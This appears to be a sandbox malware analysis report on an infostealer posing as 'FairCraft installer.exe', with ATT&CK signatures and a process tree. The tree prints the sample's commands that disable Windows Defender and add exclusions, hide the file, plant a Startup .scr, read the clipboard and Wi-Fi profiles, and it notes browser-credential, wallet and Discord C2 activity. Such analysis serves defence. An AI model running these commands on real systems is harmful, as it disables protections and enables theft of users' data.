cca79252d0da785683330467edf0eb1dde70ef7f74604631514fb5f673eb4520

Analysis

max time kernel
209s
max time network
203s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 02:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FairCraft installer.exe
Size

700.0MB
MD5

ea6ee17762e752a2b108b20f2ce785d9
SHA1

fe1cca8c477790cd00a3bff98b58219c7d54379e
SHA256

cca79252d0da785683330467edf0eb1dde70ef7f74604631514fb5f673eb4520
SHA512

2ddfd3b05e9e490e03d30c352762ca4a59e0d49e7f02a23bf355ee2c8d37a9837c6deaa6695c5be4842548cc17ddc201d2e904abad2c2eeca28f3726c67af7bb
SSDEEP

786432:nDySd8YyEhkXm4mdUvOhvk1Hkv1dni9UqaQHqM5:DyHYBrbhcSiqa

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4080	powershell.exe
3600	powershell.exe
748	powershell.exe
884	powershell.exe
4032	powershell.exe
1624	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	FairCraft installer.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2320	powershell.exe
2656	cmd.exe

Executes dropped EXE 3 IoCs

pid	Process
2056	bound.exe
1672	irsetup.exe
4644	rar.exe

Loads dropped DLL 19 IoCs

pid	Process
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
4324	FairCraft installer.exe
1672	irsetup.exe
1672	irsetup.exe
1672	irsetup.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
33	discord.com
34	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com
31	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1820	tasklist.exe
4508	tasklist.exe
1664	tasklist.exe
4148	tasklist.exe
2820	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3220	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca4-22.dat	upx
behavioral2/memory/4324-26-0x00007FFC7FD00000-0x00007FFC803C2000-memory.dmp	upx
behavioral2/files/0x0007000000023c94-28.dat	upx
behavioral2/memory/4324-31-0x00007FFC8F800000-0x00007FFC8F825000-memory.dmp	upx
behavioral2/files/0x0007000000023c9b-49.dat	upx
behavioral2/memory/4324-50-0x00007FFC99090000-0x00007FFC9909F000-memory.dmp	upx
behavioral2/files/0x0007000000023c9a-48.dat	upx
behavioral2/files/0x0007000000023c99-47.dat	upx
behavioral2/files/0x0007000000023c98-46.dat	upx
behavioral2/files/0x0007000000023c97-45.dat	upx
behavioral2/files/0x0007000000023c96-44.dat	upx
behavioral2/files/0x0007000000023c95-43.dat	upx
behavioral2/files/0x0007000000023c93-42.dat	upx
behavioral2/files/0x0007000000023ca9-41.dat	upx
behavioral2/files/0x0007000000023ca8-40.dat	upx
behavioral2/files/0x0007000000023ca7-39.dat	upx
behavioral2/files/0x0007000000023ca3-36.dat	upx
behavioral2/files/0x0007000000023ca1-35.dat	upx
behavioral2/files/0x0007000000023ca2-32.dat	upx
behavioral2/memory/4324-56-0x00007FFC8F700000-0x00007FFC8F72C000-memory.dmp	upx
behavioral2/memory/4324-60-0x00007FFC8F680000-0x00007FFC8F6A4000-memory.dmp	upx
behavioral2/memory/4324-62-0x00007FFC808D0000-0x00007FFC80A4F000-memory.dmp	upx
behavioral2/memory/4324-58-0x00007FFC8F7E0000-0x00007FFC8F7F9000-memory.dmp	upx
behavioral2/memory/4324-66-0x00007FFC98DE0000-0x00007FFC98DED000-memory.dmp	upx
behavioral2/memory/4324-65-0x00007FFC8F020000-0x00007FFC8F039000-memory.dmp	upx
behavioral2/memory/4324-72-0x00007FFC8EA90000-0x00007FFC8EB5E000-memory.dmp	upx
behavioral2/memory/4324-74-0x00007FFC8F800000-0x00007FFC8F825000-memory.dmp	upx
behavioral2/memory/4324-71-0x00007FFC8EB60000-0x00007FFC8EB93000-memory.dmp	upx
behavioral2/memory/4324-78-0x00007FFC95690000-0x00007FFC9569D000-memory.dmp	upx
behavioral2/memory/4324-76-0x00007FFC8EA70000-0x00007FFC8EA84000-memory.dmp	upx
behavioral2/memory/4324-70-0x00007FFC7FD00000-0x00007FFC803C2000-memory.dmp	upx
behavioral2/memory/4324-73-0x00007FFC7F7C0000-0x00007FFC7FCF3000-memory.dmp	upx
behavioral2/memory/4324-79-0x00007FFC8F700000-0x00007FFC8F72C000-memory.dmp	upx
behavioral2/files/0x0009000000023cac-123.dat	upx
behavioral2/memory/4324-131-0x00007FFC78100000-0x00007FFC7821A000-memory.dmp	upx
behavioral2/memory/4324-130-0x00007FFC8F680000-0x00007FFC8F6A4000-memory.dmp	upx
behavioral2/memory/4324-135-0x00007FFC808D0000-0x00007FFC80A4F000-memory.dmp	upx
behavioral2/memory/1672-136-0x0000000000180000-0x0000000000569000-memory.dmp	upx
behavioral2/memory/4324-811-0x00007FFC8EA90000-0x00007FFC8EB5E000-memory.dmp	upx
behavioral2/memory/4324-810-0x00007FFC8EB60000-0x00007FFC8EB93000-memory.dmp	upx
behavioral2/memory/4324-816-0x00007FFC7F7C0000-0x00007FFC7FCF3000-memory.dmp	upx
behavioral2/memory/4324-836-0x00007FFC7FD00000-0x00007FFC803C2000-memory.dmp	upx
behavioral2/memory/4324-850-0x00007FFC78100000-0x00007FFC7821A000-memory.dmp	upx
behavioral2/memory/4324-847-0x00007FFC8EA90000-0x00007FFC8EB5E000-memory.dmp	upx
behavioral2/memory/4324-846-0x00007FFC7F7C0000-0x00007FFC7FCF3000-memory.dmp	upx
behavioral2/memory/4324-845-0x00007FFC8EB60000-0x00007FFC8EB93000-memory.dmp	upx
behavioral2/memory/1672-1033-0x0000000000180000-0x0000000000569000-memory.dmp	upx
behavioral2/memory/4324-1048-0x00007FFC808D0000-0x00007FFC80A4F000-memory.dmp	upx
behavioral2/memory/4324-1042-0x00007FFC7FD00000-0x00007FFC803C2000-memory.dmp	upx
behavioral2/memory/4324-1043-0x00007FFC8F800000-0x00007FFC8F825000-memory.dmp	upx
behavioral2/memory/4324-1084-0x00007FFC8F680000-0x00007FFC8F6A4000-memory.dmp	upx
behavioral2/memory/4324-1093-0x00007FFC78100000-0x00007FFC7821A000-memory.dmp	upx
behavioral2/memory/4324-1099-0x00007FFC8EA90000-0x00007FFC8EB5E000-memory.dmp	upx
behavioral2/memory/4324-1098-0x00007FFC8EB60000-0x00007FFC8EB93000-memory.dmp	upx
behavioral2/memory/4324-1097-0x00007FFC98DE0000-0x00007FFC98DED000-memory.dmp	upx
behavioral2/memory/4324-1096-0x00007FFC8F020000-0x00007FFC8F039000-memory.dmp	upx
behavioral2/memory/4324-1095-0x00007FFC808D0000-0x00007FFC80A4F000-memory.dmp	upx
behavioral2/memory/4324-1094-0x00007FFC7F7C0000-0x00007FFC7FCF3000-memory.dmp	upx
behavioral2/memory/4324-1083-0x00007FFC8F7E0000-0x00007FFC8F7F9000-memory.dmp	upx
behavioral2/memory/4324-1082-0x00007FFC8F700000-0x00007FFC8F72C000-memory.dmp	upx
behavioral2/memory/4324-1081-0x00007FFC99090000-0x00007FFC9909F000-memory.dmp	upx
behavioral2/memory/4324-1080-0x00007FFC8F800000-0x00007FFC8F825000-memory.dmp	upx
behavioral2/memory/4324-1079-0x00007FFC7FD00000-0x00007FFC803C2000-memory.dmp	upx
behavioral2/memory/4324-1092-0x00007FFC95690000-0x00007FFC9569D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	irsetup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3116	cmd.exe
1988	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
224	cmd.exe
2364	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3448	WMIC.exe
4120	WMIC.exe
5080	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2224	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1988	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
884	powershell.exe
748	powershell.exe
884	powershell.exe
748	powershell.exe
4032	powershell.exe
4032	powershell.exe
4032	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
2588	powershell.exe
2588	powershell.exe
2320	powershell.exe
2320	powershell.exe
2588	powershell.exe
2320	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe
2316	powershell.exe
2316	powershell.exe
2316	powershell.exe
3600	powershell.exe
3600	powershell.exe
3600	powershell.exe
4772	powershell.exe
4772	powershell.exe
4772	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	884	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	2820	tasklist.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3448	WMIC.exe
Token: SeSecurityPrivilege	3448	WMIC.exe
Token: SeTakeOwnershipPrivilege	3448	WMIC.exe
Token: SeLoadDriverPrivilege	3448	WMIC.exe
Token: SeSystemProfilePrivilege	3448	WMIC.exe
Token: SeSystemtimePrivilege	3448	WMIC.exe
Token: SeProfSingleProcessPrivilege	3448	WMIC.exe
Token: SeIncBasePriorityPrivilege	3448	WMIC.exe
Token: SeCreatePagefilePrivilege	3448	WMIC.exe
Token: SeBackupPrivilege	3448	WMIC.exe
Token: SeRestorePrivilege	3448	WMIC.exe
Token: SeShutdownPrivilege	3448	WMIC.exe
Token: SeDebugPrivilege	3448	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3448	WMIC.exe
Token: SeRemoteShutdownPrivilege	3448	WMIC.exe
Token: SeUndockPrivilege	3448	WMIC.exe
Token: SeManageVolumePrivilege	3448	WMIC.exe
Token: 33	3448	WMIC.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1672	irsetup.exe
1672	irsetup.exe
1672	irsetup.exe
1672	irsetup.exe
1672	irsetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3676 wrote to memory of 4324	3676	FairCraft installer.exe	83
PID 3676 wrote to memory of 4324	3676	FairCraft installer.exe	83
PID 4324 wrote to memory of 4780	4324	FairCraft installer.exe	86
PID 4324 wrote to memory of 4780	4324	FairCraft installer.exe	86
PID 4324 wrote to memory of 396	4324	FairCraft installer.exe	87
PID 4324 wrote to memory of 396	4324	FairCraft installer.exe	87
PID 4780 wrote to memory of 884	4780	cmd.exe	90
PID 4780 wrote to memory of 884	4780	cmd.exe	90
PID 396 wrote to memory of 748	396	cmd.exe	91
PID 396 wrote to memory of 748	396	cmd.exe	91
PID 4324 wrote to memory of 3860	4324	FairCraft installer.exe	92
PID 4324 wrote to memory of 3860	4324	FairCraft installer.exe	92
PID 4324 wrote to memory of 2988	4324	FairCraft installer.exe	93
PID 4324 wrote to memory of 2988	4324	FairCraft installer.exe	93
PID 4324 wrote to memory of 3864	4324	FairCraft installer.exe	94
PID 4324 wrote to memory of 3864	4324	FairCraft installer.exe	94
PID 4324 wrote to memory of 2556	4324	FairCraft installer.exe	97
PID 4324 wrote to memory of 2556	4324	FairCraft installer.exe	97
PID 3860 wrote to memory of 4032	3860	cmd.exe	100
PID 3860 wrote to memory of 4032	3860	cmd.exe	100
PID 2556 wrote to memory of 2820	2556	cmd.exe	101
PID 2556 wrote to memory of 2820	2556	cmd.exe	101
PID 3864 wrote to memory of 3952	3864	cmd.exe	102
PID 3864 wrote to memory of 3952	3864	cmd.exe	102
PID 2988 wrote to memory of 2056	2988	cmd.exe	103
PID 2988 wrote to memory of 2056	2988	cmd.exe	103
PID 2988 wrote to memory of 2056	2988	cmd.exe	103
PID 4324 wrote to memory of 5068	4324	FairCraft installer.exe	153
PID 4324 wrote to memory of 5068	4324	FairCraft installer.exe	153
PID 2056 wrote to memory of 1672	2056	bound.exe	107
PID 2056 wrote to memory of 1672	2056	bound.exe	107
PID 2056 wrote to memory of 1672	2056	bound.exe	107
PID 5068 wrote to memory of 4236	5068	cmd.exe	111
PID 5068 wrote to memory of 4236	5068	cmd.exe	111
PID 4324 wrote to memory of 768	4324	FairCraft installer.exe	112
PID 4324 wrote to memory of 768	4324	FairCraft installer.exe	112
PID 768 wrote to memory of 3468	768	cmd.exe	114
PID 768 wrote to memory of 3468	768	cmd.exe	114
PID 4324 wrote to memory of 4184	4324	FairCraft installer.exe	150
PID 4324 wrote to memory of 4184	4324	FairCraft installer.exe	150
PID 4184 wrote to memory of 1948	4184	cmd.exe	117
PID 4184 wrote to memory of 1948	4184	cmd.exe	117
PID 4324 wrote to memory of 1332	4324	FairCraft installer.exe	118
PID 4324 wrote to memory of 1332	4324	FairCraft installer.exe	118
PID 1332 wrote to memory of 3448	1332	cmd.exe	120
PID 1332 wrote to memory of 3448	1332	cmd.exe	120
PID 4324 wrote to memory of 1860	4324	FairCraft installer.exe	121
PID 4324 wrote to memory of 1860	4324	FairCraft installer.exe	121
PID 1860 wrote to memory of 4120	1860	cmd.exe	123
PID 1860 wrote to memory of 4120	1860	cmd.exe	123
PID 4324 wrote to memory of 3220	4324	FairCraft installer.exe	126
PID 4324 wrote to memory of 3220	4324	FairCraft installer.exe	126
PID 3220 wrote to memory of 972	3220	cmd.exe	128
PID 3220 wrote to memory of 972	3220	cmd.exe	128
PID 4324 wrote to memory of 1944	4324	FairCraft installer.exe	129
PID 4324 wrote to memory of 1944	4324	FairCraft installer.exe	129
PID 4324 wrote to memory of 1784	4324	FairCraft installer.exe	131
PID 4324 wrote to memory of 1784	4324	FairCraft installer.exe	131
PID 4324 wrote to memory of 5024	4324	FairCraft installer.exe	132
PID 4324 wrote to memory of 5024	4324	FairCraft installer.exe	132
PID 1944 wrote to memory of 1624	1944	cmd.exe	135
PID 1944 wrote to memory of 1624	1944	cmd.exe	135
PID 4324 wrote to memory of 408	4324	FairCraft installer.exe	136
PID 4324 wrote to memory of 408	4324	FairCraft installer.exe	136

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
972	attrib.exe
2024	attrib.exe
3492	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe
"C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3676
- C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe
  "C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2056
    - - C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1773458 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\bound.exe" "__IRCT:3" "__IRTSS:25260914" "__IRSID:S-1-5-21-493223053-2004649691-1575712786-1000"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('FairCraft installer unknown error you may need contact developer.', 0, 'FairCraft installer', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3864
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('FairCraft installer unknown error you may need contact developer.', 0, 'FairCraft installer', 32+16);close()"
      4⤵
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3220
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe"
      4⤵
      Views/modifies file attributes
      PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:408
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2248
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:224
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2132
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4184
  - - C:\Windows\system32\reg.exe
